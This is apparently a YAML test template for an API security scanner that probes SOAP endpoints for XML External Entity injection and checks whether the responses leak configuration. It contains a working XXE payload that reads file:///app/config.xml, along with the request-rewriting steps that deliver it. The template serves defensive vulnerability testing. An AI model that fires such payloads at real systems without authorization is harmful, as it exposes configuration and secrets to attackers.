id: XXE_SOAP_API_CONFIG_DISCLOSURE
info:
  name: "XML External Entity (XXE) test on SOAP API for Configuration Disclosure"
  description: >
    "This test involves exploiting vulnerabilities in SOAP API by injecting malicious XML payloads to reveal sensitive configuration details, potentially exposing critical information about the target system."
  details: >
    "XML External Entity (XXE) test on SOAP API for Configuration Disclosure entails manipulating SOAP requests with crafted XML payloads to uncover and potentially disclose confidential configuration information, opening avenues for security risks within the targeted system."
  impact: >
    "Successful XML External Entity (XXE) test on SOAP API for Configuration Disclosure can result in unauthorized access to critical configuration details, potentially compromising system integrity and providing adversaries with valuable insights for targeted exploits."
  category:
    name: INJECT
    shortName: Injection Attacks
    displayName: Injection Attacks (INJECT)
  subCategory: XXE_SOAP_API_CONFIG_DISCLOSURE
  severity: MEDIUM
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing"
    - "https://www.akto.io/blog/xml-external-entity-attack"
    - "https://www.akto.io/blog/xml-injection-vulnerability-examples-cheatsheet-and-prevention"
  cwe:
    - CWE-611
    - CWE-827
  cve:
    - CVE-2022-42745
attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST
compliance_standards:
  GDPR:
    - Article 32
    - Article 25
  HIPAA:
    - 45 CFR ยง 164.312(c)(1)
    - 45 CFR ยง 164.308(a)(1)(ii)(A)
  SOC 2:
    - System and Communication Security
    - Secure Application Development Controls
  PCI DSS:
    - Requirement 6.5.1
    - Requirement 11.3
  ISO 27001:
    - A.12.6.1
    - A.14.2.5
  NIST 800-53:
    - SI-10
    - SI-3
  CSA CCM:
    - APP-02
    - TVM-03
  CIS Controls:
    - IG1 Safeguard 16.2
    - IG2 Safeguard 18.3
  FedRAMP:
    - SI-10
    - CA-7
  NIST 800-171:
    - 3.14.1
    - 3.14.2
  FISMA:
    - SI-10
    - SI-3
  Cybersecurity Maturity Model Certification (CMMC):
    - SI.2.216
    - RA.3.141
api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  response_payload:
    contains_either: "soap:Envelope"
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  request_headers:
    for_one:
      key:
        contains_either:
          - content-type
          - Content-Type
        extract: headerKey
  method:
    contains_either:
      - POST
      - PUT
      - PATCH

wordLists:
  payloads:
    - "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///app/config.xml\">]>"
execute:
  type: single
  requests:
    - req:
        - replace_body: ${payloads}
        - modify_header:
            ${headerKey}: "application/xml"
validate:
  response_payload:
    regex: "<(config|configuration|settings)>.+</(config|configuration|settings)>"
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
      - Attention Required!
      - CloudFlare
      - Sorry, you have been blocked
      - <html>
      - </html>
